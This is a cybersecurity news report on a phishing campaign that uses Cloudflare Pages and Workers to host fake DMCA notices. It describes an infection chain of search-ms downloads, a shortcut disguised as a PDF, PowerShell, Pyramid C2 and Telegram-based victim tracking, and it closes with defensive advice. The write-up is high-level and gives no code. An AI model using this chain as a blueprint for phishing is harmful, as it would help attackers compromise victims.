In a concerning development, cybersecurity researchers have uncovered a sophisticated phishing campaign orchestrated by a Russian-speaking threat actor.
The operation leverages Cloudflare’s Pages and Workers services to deploy phishing pages disguised as legitimate DMCA (Digital Millennium Copyright Act) takedown notices.
These pages trick victims into downloading malicious files, initiating a complex infection chain that includes Telegram-based victim tracking and Pyramid Command-and-Control (C2) infrastructure.
Phishing Tactics and Infrastructure
The phishing campaign employs lures hosted on domains ending in “pages.dev” and “workers.dev,” services typically used for legitimate purposes like static website hosting and serverless JavaScript execution.
The attackers use these platforms to impersonate secure document-sharing services, targeting individuals with DMCA-themed notices.
Victims are directed to download files via the “search-ms” protocol, which opens a Windows Explorer window to retrieve malicious content disguised as legitimate documents.
The infection chain begins with a Windows shortcut (.lnk) file masquerading as a PDF.
Once executed, the shortcut triggers a PowerShell script that downloads a ZIP archive containing both legitimate and malicious files.
The payload includes a Python script configured to communicate with Pyramid C2 servers, enabling attackers to control infected systems remotely.
Researchers identified over 20 domains connected to this infrastructure, many of which reused file names while altering their contents.
The malicious servers were hosted on networks such as Railnet LLC, exposing open directories that facilitated the delivery of staged payloads.
Telegram Integration for Victim Tracking
A notable evolution in the attackers’ tactics is the integration of Telegram for victim tracking.
The PowerShell script “kozlina2.ps1” uses hardcoded Telegram bot credentials to send infected hosts’ IP addresses to the attackers via the Telegram Bot API.
This data is collected using external services like ip-api.com before being transmitted to the attackers’ Telegram channel, titled “ПШ КОД ЗАПУСК” (“PS CODE LAUNCH”).
Researchers were able to gather limited details about the operators behind this channel, identifying accounts such as @tyyndrabot (used for receiving IP addresses), @pups2131 (the administrator), and Skandi (a group member whose role remains unclear).
The campaign also demonstrates incremental advancements in obfuscation techniques.
For instance, the Python script “kursor.py,” which facilitates communication with Pyramid C2 servers, now includes additional junk characters in its configuration strings before decoding begins.
While this technique does not significantly complicate analysis, it reflects ongoing efforts by the threat actor to evade detection and frustrate cybersecurity defenses.
This campaign underscores the growing abuse of trusted services like Cloudflare and Telegram by cybercriminals seeking to mask early-stage malicious activity.
The use of legitimate system interfaces such as “search-ms” further complicates detection in environments where protocol handlers are not actively monitored or restricted.
Cybersecurity experts recommend vigilance in monitoring for abuse of protocol handlers like “search-ms,” tracking open directories serving malicious payloads, and scrutinizing trusted services exploited for phishing campaigns.
As threat actors continue to refine their tactics, defenders must revisit known methods and infrastructure over time to stay ahead of evolving threats.
This discovery highlights the importance of proactive threat hunting and robust cybersecurity measures to mitigate risks posed by increasingly sophisticated phishing campaigns targeting unsuspecting users worldwide.
Find this Story Interesting! Follow us on LinkedIn, and X to Get More Instant Updates
